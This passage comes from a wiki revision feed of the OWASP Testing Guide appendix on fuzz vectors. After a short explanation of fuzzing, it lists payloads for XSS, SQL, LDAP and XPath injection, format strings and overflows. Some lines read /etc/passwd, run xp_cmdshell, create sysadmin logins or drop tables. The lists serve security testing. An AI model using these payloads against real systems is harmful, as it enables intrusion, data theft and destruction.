&amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Active SQL Injection (SQI) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13701</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13701"/>
				<updated>2006-11-26T14:24:31Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Format String Errors (FSE) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replasive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replasive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG&lt;br /&gt;
SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows (BFO) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here. &lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Errors (FSE) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%p%x%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;.1024d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%.2049d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Integer Overflows (INT) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Passive SQL Injection (SQP) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
